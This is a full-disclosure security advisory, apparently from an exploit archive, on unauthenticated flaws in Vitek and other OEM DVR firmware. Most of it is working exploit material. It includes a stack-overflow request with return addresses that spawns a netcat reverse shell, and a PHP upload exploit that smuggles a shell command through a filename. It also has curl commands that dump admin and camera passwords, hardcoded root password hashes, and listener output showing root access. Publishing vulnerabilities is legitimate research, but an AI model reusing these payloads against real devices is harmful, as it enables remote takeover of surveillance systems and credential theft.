扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 |
[STX] Subject: Vitek RCE and Information Disclosure (and possible other OEM) Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis <mcw noemail eu> (December 2017) PoC: https://github.com/mcw0/PoC Release date: December 22, 2017 Full Disclosure: 0-day heap: Executable + Non-ASLR stack: Executable + ASLR -[Manufacture Logo]- _ _ _ _ _ _ _ _ _ _ _ _ \__ __ _ ___ / /__/ \ |_/ / __ /-_ ___ / // // / _ _ _ _/ //\_/\_ ______ ___________\___\__________________ -[OEM (found in the code)]- Vitek (http://www.vitekcctv.com/) - Verified: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R Thrive Wisecon Sanyo Inodic CBC Elbex Y3K KTNC -[Stack Overflow RCE]- [Reverse netcat shell] $ echo -en "GET /dvrcontrol.cgi?nc\x24\x7bIFS\x7d192.168.57.1\x24\x7bIFS\x7d31337\x24\x7bIFS\x7d-e\x24\x7bIFS\x7dsh\x24\x7bIFS\x7d HTTP/1.0\r\nAuthorization Pwned: <code>for((i=0;i<272;i++)); do echo -en "A";done</code>\x80\x9a\x73\x02\xc8\x4a\x11\x20\r\n\r\n"|ncat 192.168.57.20 81 [Listener] $ ncat -vlp 31337 Ncat: Version 7.60 ( https://nmap.org/ncat ) Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: E672 0A5B B852 8EF9 36D0 E979 2827 1FAD 7482 8A7B Ncat: Listening on :::31337 Ncat: Listening on 0.0.0.0:31337 Ncat: Connection from 192.168.57.20. Ncat: Connection from 192.168.57.20:36356. pwd /opt/fw whoami root exit $ Note: 1. Badbytes: 0x00,0x09,0x0a,0x0b,0x0c,0x0d,0x20 2. 0x20 will be replaced with 0x00 by the H4/H1/N1 binary, use this to jump binary included system() address: 0x00114AC8 [system() call in H4] 3. 0x02739A0C + 0x74 = $r11 address we need (0x2739A80) to point our CMD string on heap for system() in $r0 H1: VT-HDOC4E_Firmware_1.21A_UI_1.1.C.6 .rodata:005292E8 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0 .text:001CD138 SUB R3, R11, #0x74 .text:001CD13C MOV R0, R3 .text:001CD140 BLsystem H4: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R .rodata:00B945A0 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0 .text:00114AC8 SUB R3, R11, #0x74 .text:00114ACC MOV R0, R3 .text:00114AD0 BLsystem N1: VT-HDOC8E_Firmware_1.21E_UI_1.1.C.6 .rodata:004A4AC4 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0 .text:001E9F0C SUB R3, R11, #0x74 .text:001E9F10 MOV R0, R3 .text:001E9F14 BLsystem -[PHP RCE]- Note: /mnt/usb2 must be mounted and R/W... (normally R/O w/o USB stick inserted) [Reverse netcat shell (forking)] $ curl -v 'http://192.168.57.20:80/cgi-bin/php/htdocs/system/upload_check.php' -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1337" -d "<code>echo -en "\r\n\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n100000000\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"\|\|nc\$\{IFS\}\$\{REMOTE_ADDR\}\$\{IFS\}31337\$\{IFS\}-e\$\{IFS\}sh\$\{IFS\}\&\$\{IFS\}\|\|\"\r\nContent-Type: application/gzip\r\n\r\nPWNED\r\n\r\n------WebKitFormBoundary1337--\r\n\r\n"</code>" -X POST 200 OK [...] > ERROR : Current_fw_info File Open Error<br>> ERROR : dvr_upgrade File Open Error<br>F/W File(||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||) Upload Completed.<br>If you want to upgrade please click START button<br><br><form enctype="multipart/form-data" action="fw_update.php" method="post"><input type="hidden" name="PHPSESSID" value="67eaa14441089e5d2e7fe6ff0fa88d42" /><input type="submit" value="START"></form> </tbody> [...] [Listener] $ ncat -vlp 31337 Ncat: Version 7.60 ( https://nmap.org/ncat ) Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: 76D3 7FA3 396A B9F6 CCA6 CEA5 2EF8 06DF FF72 79EF Ncat: Listening on :::31337 Ncat: Listening on 0.0.0.0:31337 Ncat: Connection from 192.168.57.20. Ncat: Connection from 192.168.57.20:52726. pwd /opt/www/htdocs/system whoami nobody ls -l /mnt/usb2/ total 4 drwxrwxrwx2 nobody nobody 0 Dec 16 02:55 dvr -rw-------1 nobody nobody 7 Dec 16 02:55 ||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}|| exit $ -[Login / Password Disclosure]- curl -v "http://192.168.57.20:80/menu.env" | hexdump -C [binary config, login and password can be found for admin login and all connected cameras] Admin l/p [...] 0000138000 00 00 00 01 01 00 0101 01 01 00 00 00 00 00|................| 0000139000 00 00 00 00 41 44 4d49 4e 00 00 00 00 00 00|.....ADMIN......| 000013a000 00 00 00 00 00 00 0000 00 00 00 00 00 00 00|................| * 0000140000 00 00 00 00 00 00 0000 00 00 00 00 00 31 32|..............12| 0000141033 34 00 00 00 00 00 0000 00 00 00 00 00 00 00|34..............| 0000142000 00 00 00 00 00 00 0000 00 00 00 00 00 00 00|................| Cameras l/p [...] 00008d8000 00 00 00 c0 00 a8 0001 00 15 00 92 1f 00 00|................| 00008d9091 1f 00 00 72 6f 6f 7400 00 00 00 00 00 00 00|....root........| 00008da000 00 00 00 70 61 73 7300 00 00 00 00 00 00 00|....pass........| 00008db000 00 00 00 00 00 00 0000 00 00 00 00 00 00 00|................| 00008dc000 00 00 00 00 00 00 0000 00 00 00 c0 00 a8 00|................| 00008dd001 00 16 00 94 1f 00 0093 1f 00 00 72 6f 6f 74|............root| 00008de000 00 00 00 00 00 00 0000 00 00 00 70 61 73 73|............pass| 00008df000 00 00 00 00 00 00 0000 00 00 00 00 00 00 00|................| -[Hardcode l/p]- FTP: TCP/10021 TELNET: TCP/10023 /etc/passwd root:$1$5LFGqGq.$fUozHRdzvapI2qBf1EeoJ0:0:0:root:/root:/bin/sh woody:$1$e0vY7A0V$BjS38SsHNWC5DxEGlzuEP1:1001:100:woohyun digital user:/home/woody:/bin/sh -[Korean hardcoded DNS]- $ cat /etc/resolv.conf nameserver 168.126.63.1 nameserver 0.0.0.0 nameserver 0.0.0.0 $ $ nslookup 168.126.63.1 1.63.126.168.in-addr.arpa name = kns.kornet.net. $ nslookup 168.126.63.2 2.63.126.168.in-addr.arpa name = kns2.kornet.net. -[Other Information Disclosure]- curl -v "http://192.168.57.20:80/webviewer/netinfo.dat" 192,168,57,20 192,168,2,100 00:0A:2F:XX:XX:XX 00:0A:2F:YY:YY:YY 255.255.255.0 192.168.57.1 -[MAC Address Details]- Company: Artnix Inc. Address: Seoul 137-819, KOREA, REPUBLIC OF Range: 00:0A:2F:00:00:00 - 00:0A:2F:FF:FF:FF Type: IEEE MA-L curl -v "http://192.168.57.20:80/webviewer/gw.dat" Kernel IP routing table Destination Gateway Genmask Flags Metric RefUse Iface 192.168.2.0 0.0.0.0 255.255.255.0 U 000 eth1 192.168.57.00.0.0.0 255.255.255.0 U 000 eth0 0.0.0.0 192.168.57.10.0.0.0 UG000 eth0 curl -v "http://192.168.57.20:80/cgi-bin/php/lang_change.php?lang=0" Change GUI Language to English [... and more] [ETX] |
体验盒子
